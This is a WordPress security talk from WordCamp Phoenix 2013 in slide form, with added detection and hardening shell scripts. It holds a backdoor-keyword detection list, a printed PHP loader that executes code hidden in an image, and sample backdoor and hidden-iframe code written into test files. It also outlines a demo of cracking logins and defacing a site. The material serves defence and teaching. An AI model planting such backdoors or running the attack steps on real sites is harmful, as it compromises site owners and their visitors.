WordPress Security - WordCamp Phoenix 2013


DESCRIPTION

WordPress security at WordCamp Phoenix 2013.


WordPress Security

Dealing with Today’s Hacks

04/10/2023

If you don’t ask, you don’t get!

• Dre Armeda, CISSP
• CEO, Co-Founder at Sucuri Inc.
• @dremeda
• Dre.im

I'm a Harley enthusiast, and a Chargers fan. I wear many hats, and love tacos. I'm infatuated with WordPress, web design, and web security. I work at Sucuri Security. I hope to help make the web a safer place!

Dre Armeda - @dremeda #wcphx

Why listen to me? You don’t have to, but…

• 12 years running IT, IS, Crypto, InfoSec & PhySec for the US Navy.
  – Managed security awareness for Sempra Energy
  – Deployed security suite for 1-800-Flowers.
  – Cleaned Martha Stewart web properties of malware

• Not an expert, passionate enthusiast.
• Seriously though – Quick Sucuri stats:
  – Remediate 200 – 300 infected websites a day, 24/7/365
  – Perform 2 million + malware website scans a month
  – Support all CMS platforms and custom applications (e.g., WordPress, Joomla, osCommerce, vBulletin, Drupal, .NET, etc.)

My goal in life is to make the web a safer place!

04/10/2023 Dre Armeda - @dremeda #wcphx

Thoughts To Kick Things Off

• Information Security is about risk reduction.
  – If you’re looking for the “silver bullet” this is the wrong talk for you.
• To think that you will never be infected is like saying you will never be sick.
  – Someone tells you different – Percussion calibration time
• Prevention is ideal, but not realistic.
  – Risk will never be 0%
  – Detection is key.


Know Your Enemy

• They have time & resources
• They are intelligent
• Attacks are automated
• Goal is to impact quantity
• Own one, own them all…
• It’s not personal


Ok, so what’s the problem?

TODAY’S ISSUES:
• The Ecosystem / Environment
• Access Control
• Software Vulnerabilities
• Administration
• Credential Management
• Extensibility


Today’s Focus

• Ecosystem / Environment
• Access Control
• Dealing with Hacks


Logical Architecture

(Diagram of the hosting stack: Linux operating system; Apache and its modules; PHP and its modules; PHP-CGI; MySQL; with WordPress, cPanel, Plesk and phpMyAdmin running on top.)


The EcoSystem / Environment

• Apache
  – Malicious module injects iFrames
  – http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/
• phpMyAdmin
  – Mirror hacked
  – http://sourceforge.net/blog/phpmyadmin-back-door/
• PHP-CGI
  – Remote Code Execution
  – http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-wild.html
• Plesk
  – Vulnerable to SQLi attacks
  – http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html


The EcoSystem / Environment

• What can you do?
  – Not much… it is completely outside of your control if you’re using a shared or managed host
• But, you can reduce risk...
  – Use a Dedicated / VPS Environment
    • But recognize the responsibility that this entails; if what I mentioned previously doesn’t make sense, skip to the next step
  – Go with a Managed Host
    • Doesn’t mean you’ll be safer, but it does mean you’ll have resources to lean on


Access is Key

• We have to change the way we treat and think about access. All access – Server / Application

• We are going through the same mistakes servers and desktops were making in the 90’s with access.

• Know where you are surfing the web: do you really need to log in as an admin at the coffee shop?


Before We Dive In


WordPress Loving Infections

• Defacements
• Backdoors
• Pharma Hack
• Injections
  – iFrame specifically
• Malicious Redirects
• Phishing


DEFACEMENTS

Hacktivism at its finest… you now support a cause!?!?!

Defacements

• Hacktivism 101
  – Annoying as S*&T
• Places to look:
  – index.html
  – index.php
    • Root directory
    • wp-content
    • Theme directory
• grep is your friend:
  – grep -ri 'sniper399' .


BACKDOORS

It’s ok to cry a little…

Backdoors

• Common terms:
  – is_bot
  – eval
  – base64_decode
  – fopen
  – fclose
  – readfile
  – edoced_46esab (base64_decode written backwards)
  – exec
  – system
  – shell_exec
  – gzuncompress
  – popen
  – FilesMan


PHARMA HACK

Erectile Dysfunction pills are leading ads.. Who knew..

Pharma Hack

• Multi-million $ Business
• Rarely Distribute Malware
• Impression based Affiliate Marketing
• Google’s Search Engine Result Pages (SERP)
• Odds of malware distribution are actually low
• Tricks:
  – Embedded within core files
  – Look for “.tmp” directories


Pharma Hack, cntd..

• Try using curl to emulate Google and Windows:
  curl -L -A "Googlebot/2.1 (+http://www.google.com/bot.html)" http://someinfectedwebsite.com
  – Google Webmaster Tools
    • Fetch as Google Bot
• Check your theme index.php file for things like this:
  – <?php $wp__theme_icon = @create_function('', @file_get_contents('/public_html/wp-content/themes/my-really-good-theme/images/s.jpg')); $wp__theme_icon(); ?>
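The curl trick above only helps if you compare what Googlebot gets with what a visitor gets. This added example (not code from the slides or from Sucuri) fetches both views and reports lines served only to the bot that mention pharma keywords; the browser UA string, the keyword list and the sample pages are constructed for the demo.

```shell
#!/bin/sh
# Added cloaking check (not from the slides). The pharma hack serves spam only
# to search engines, so the same URL is fetched as Googlebot and as a browser,
# and lines present only in the bot view are searched for pharma keywords.

# Fetch $1 twice, saving the Googlebot view to $2 and the browser view to $3.
# The Googlebot string is the one the slide quotes; the browser UA is assumed.
fetch_both_views() {
    curl -sL -A 'Googlebot/2.1 (+http://www.google.com/bot.html)' "$1" -o "$2"
    curl -sL -A 'Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0' \
        "$1" -o "$3"
}

# Print lines that exist only in the bot view ($1) and mention pharma terms.
# Empty output means the site looks the same to Google and to visitors.
# The keyword list is a constructed starting point, not a complete one.
cloak_diff() {
    bot_sorted=$(mktemp); browser_sorted=$(mktemp)
    sort -u "$1" > "$bot_sorted"
    sort -u "$2" > "$browser_sorted"
    comm -23 "$bot_sorted" "$browser_sorted" \
        | grep -iE 'viagra|cialis|levitra|pharm|pills|tramadol' || true
    rm -f "$bot_sorted" "$browser_sorted"
}

# Usage (needs network access, so it is not run here):
#   fetch_both_views http://someinfectedwebsite.com bot.html browser.html
#   cloak_diff bot.html browser.html
```

A clean site produces no output; any hit means the server is choosing content by User-Agent, which is the cloaking the slide describes.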


INJECTIONS

It only hurts for a minute…

Injections

• Invisible iFrames - executing in your browser
• Contributing to Drive-by-Downloads, Pharma, XSS, CSRF
• Places to check – pages that generate content:
  – JS files, header.php, index.php, functions.php, footer.php


Injections, cntd…

• PHP iFrame Injection
  – Count##.php
  – Check all index.php / theme JS files
  – Example below: (screenshot)


Injections, cntd…

• Pharma Link Injections (screenshot)
• Drive-By-Downloads (screenshot)


MALICIOUS REDIRECTS

WTF?!?! Why don’t I understand what it says?

Malicious Redirects

• Redirects your user to a domain distributing malware; fundamentally different from an iframe injection, which executes in your browser
• 8 out of 10 times, check your .htaccess file – all of them
  – # find /var/www -name .htaccess -type f | wc -l
• Check for backdoors also – often a sign of a bigger issue
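The backdoor terms, the hidden-iframe injections and the .htaccess check from the last three sections can be triaged with one grep/find script. This is an added example, not code from the slides or from Sucuri; the regexes, the sample tree the demo builds and the example.invalid host are constructed for the demo.

```shell
#!/bin/sh
# Added triage helper (not from the slides): greps a WordPress tree for the
# backdoor terms listed above, hidden iframes, and .htaccess redirects.
# Read-only; run it on a copy of the site before cleaning anything.

# Regex built from the slide's term list. edoced_46esab is base64_decode
# written backwards, a common obfuscation.
BACKDOOR_RE='is_bot|eval *\(|base64_decode|fopen|fclose|readfile|edoced_46esab|exec *\(|system *\(|shell_exec|gzuncompress|popen|FilesMan'

# Hidden iframes: zero size or hidden by CSS, typical of drive-by injections.
IFRAME_RE='<iframe[^>]*(width=[^0-9a-z]?0[^0-9]|height=[^0-9a-z]?0[^0-9]|display: *none|visibility: *hidden)'

# Print unique "file:line" hits for backdoor terms in PHP, JS and HTML files.
scan_backdoors() {
    grep -rniE --include='*.php' --include='*.js' --include='*.html' \
        "$BACKDOOR_RE" "$1" 2>/dev/null | cut -d: -f1,2 | sort -u
}

# Print "file:line" for hidden-iframe markup in the same file types.
scan_iframes() {
    grep -rniE --include='*.php' --include='*.js' --include='*.html' \
        "$IFRAME_RE" "$1" 2>/dev/null | cut -d: -f1,2 | sort -u
}

# Print every .htaccess whose Redirect or RewriteRule targets another host.
scan_htaccess_redirects() {
    find "$1" -type f -name '.htaccess' 2>/dev/null | sort | while read -r f; do
        if grep -qiE '^(Redirect|RewriteRule).*https?://' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Demo on a constructed sample tree (not a real site): prints one hit each.
demo() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/themes/twentytwelve" "$d/wp-content/uploads"
    printf '<?php get_header(); ?>\n' > "$d/index.php"
    printf '<?php eval(base64_decode($_POST["c"])); ?>\n' > "$d/wp-content/uploads/s.php"
    printf '<iframe src="http://example.invalid/" width="0" height="0"></iframe>\n' \
        > "$d/wp-content/themes/twentytwelve/footer.php"
    printf 'RewriteRule ^(.*)$ http://example.invalid/$1 [R,L]\n' > "$d/wp-content/uploads/.htaccess"
    scan_backdoors "$d"; scan_iframes "$d"; scan_htaccess_redirects "$d"
    rm -rf "$d"
}
demo
```

Expect hits in legitimate plugin code too (fopen, exec and base64_decode are common), so the output is a review list, not a verdict.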


PHISHING

Biggest growing problem, exceptionally difficult to detect…

Phishing

• Growing at a faster pace than traditional web-malware

• No impact to readers, but tied to SPAM bots sending out emails like this: (screenshot)


DEMONSTRATION

Bringing the Point Home

Demo Objective

• Use good tools for bad things – wpscan
• Enumerate the users
• Enumerate passwords
• Own target WordPress site
• Deface the website

I have 5 minutes – Ready?


KEEPING IT REAL

Remember the risk discussion?

Update

• Oldest version found in production – 1.5
• Leading cause of cross-site contamination issues
• Perhaps the simplest of tasks, yet we still find this: (screenshot)


Access is Key

• On the Server:
  – Kill accounts that are not in use
  – FTP is the devil – slap yourself and switch to SFTP
  – Disable password auth & use key pairs
• WordPress Admin:
  – Multi-Factor Authentication on wp-admin
  – Two-Factor Authentication on wp-login.php
• Employ least privilege:
  – Only use admin accounts for admin tasks
  – Learn to use Editor, Author, Contributor, Subscriber


Password Dilemma

• 15 character pass
  – 3 months to crack
• Long / Complex / Unique
  – Key to Passwords
• Prefer Password Manager
  – You don’t? ok..
  – Passphrases work too
    • iLuvWCLpHX:2013:S@nT@N b@By
• Come up with a process & stick to it:
  – One scheme:
    • Remember 8 characters
    • Write Down 8 characters
    • Save 20 characters
  – Second scheme:
    • Remember 20 characters
    • Prefix characters with site name
    • End sequence with some date

Kill PHP Execution

• Kill PHP Execution – Directories:
  • WP-INCLUDES
  • WP-CONTENT
  • UPLOADS – At a minimum

  <Files *.php>
  Deny from all
  </Files>


Disable Theme / Plugin Editor

I’d take it a step further and remove the ability to install, but that’s just me.

Modify WP-CONFIG.PHP With:

• Disable the Plugin / Theme Editor
  – define('DISALLOW_FILE_EDIT', true);

- OR -

• Disable the Plugin / Theme Update and Installation
  – define('DISALLOW_FILE_MODS', true);
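The two hardening steps above (the deny-PHP .htaccess from Kill PHP Execution and the wp-config.php constants) can be applied repeatably with the script below, an added example that is not code from the slides or from WordPress. It assumes a writable site tree and the standard "stop editing" marker that wp-config-sample.php ships with; some themes and plugins serve PHP straight out of wp-content, so apply the deny rule per directory and test it with a browser request that should come back 403.

```shell
#!/bin/sh
# Added hardening helper (not from the slides): installs the "deny *.php" rule
# from the Kill PHP Execution slide and adds the wp-config.php constants above.
# Both steps are idempotent, so re-running on a hardened site changes nothing.

# Append an .htaccess block to directory $1 that refuses to serve PHP from it.
# Apache 2.4 reads "Require all denied"; the slide's "Deny from all" is the
# Apache 2.2 form and is kept for older servers via IfModule.
deny_php_execution() {
    f="$1/.htaccess"
    if [ -f "$f" ] && grep -q 'Require all denied' "$f"; then
        return 0
    fi
    cat >> "$f" <<'EOF'
# Refuse to execute PHP files uploaded into this directory
<Files "*.php">
  <IfModule mod_authz_core.c>
    Require all denied
  </IfModule>
  <IfModule !mod_authz_core.c>
    Order deny,allow
    Deny from all
  </IfModule>
</Files>
EOF
}

# Add define('NAME', true); to wp-config.php ($1) before WordPress's
# "stop editing" marker, or at the end if the marker is missing.
add_wp_define() {
    name="$2"
    if grep -Eq "define\( *'$name'" "$1"; then
        return 0
    fi
    awk -v line="define('$name', true);" '
        /stop editing/ && !done { print line; done = 1 }
        { print }
        END { if (!done) print line }' "$1" > "$1.tmp" && mv "$1.tmp" "$1"
}

# Succeed (exit 0) only if wp-config.php ($1) already defines $2 as true.
has_wp_define() {
    grep -Eq "define\( *'$2' *, *true *\)" "$1"
}
```

DISALLOW_FILE_MODS also switches off the file editor, so setting it alone covers both bullets; keep a backup of wp-config.php before running anything that rewrites it.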


Plugins That Help

Sucuri Clients
• Sucuri Security Plugin
• Theme-Check
• BackupBuddy
• Akismet

Non-Clients
• Limit Login Attempts
• Theme-Check
• BackupBuddy
• Akismet


Need a Hand?

Support Forums

• Sucuri Blog: http://blog.sucuri.net
• SiteCheck Scanner: http://sitecheck.sucuri.net
• Unmask Parasites: http://unmaskparasites.com
• Perishable Press: http://perishablepress.com/category/web-design/security/
• Secunia Security Advisories: http://secunia.com/community/advisories/search/?search=wordpress

Online Resources

• Hacked – http://wordpress.org/tags/hacked

• Malware – http://wordpress.org/tags/malware

• BadwareBusters – https://badwarebusters.org


Dre Armeda, CISSP
Dre.im
@dremeda

Sucuri Inc.
http://sucuri.net
http://blog.sucuri.net
@sucuri_security


Thanks to Tony Perez @perezbox for allowing me to cannibalize his slide deck.